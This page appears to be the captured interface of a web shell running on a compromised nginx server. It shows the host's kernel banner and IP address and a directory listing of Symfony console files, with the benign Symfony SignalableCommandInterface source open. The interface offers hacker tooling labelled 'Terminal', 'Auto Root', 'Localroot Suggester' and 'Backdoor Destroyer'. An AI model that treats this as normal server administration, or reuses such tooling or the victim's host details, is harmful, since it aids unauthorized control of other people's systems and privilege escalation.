Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.119.103.13
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
vendor /
symfony /
console /
Command /
Delete
Unzip
Name
Size
Permission
Date
Action
Command.php
20.02
KB
-rw-rw-r--
2022-07-22 10:42
CompleteCommand.php
8.36
KB
-rw-rw-r--
2022-07-22 10:42
DumpCompletionCommand.php
4.45
KB
-rw-rw-r--
2022-07-22 10:42
HelpCommand.php
3.04
KB
-rw-rw-r--
2022-07-22 10:42
LazyCommand.php
5.26
KB
-rw-rw-r--
2022-07-22 10:42
ListCommand.php
3.06
KB
-rw-rw-r--
2022-07-22 10:42
LockableTrait.php
1.68
KB
-rw-rw-r--
2022-07-22 10:42
SignalableCommandInterface.php
682
B
-rw-rw-r--
2022-07-22 10:42
Save
Rename
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Console\Command; /** * Interface for command reacting to signal. * * @author Grégoire Pineau <lyrixx@lyrix.info> */ interface SignalableCommandInterface { /** * Returns the list of signals to subscribe. */ public function getSubscribedSignals(): array; /** * The method will be called when the application is signaled. */ public function handleSignal(int $signal): void; }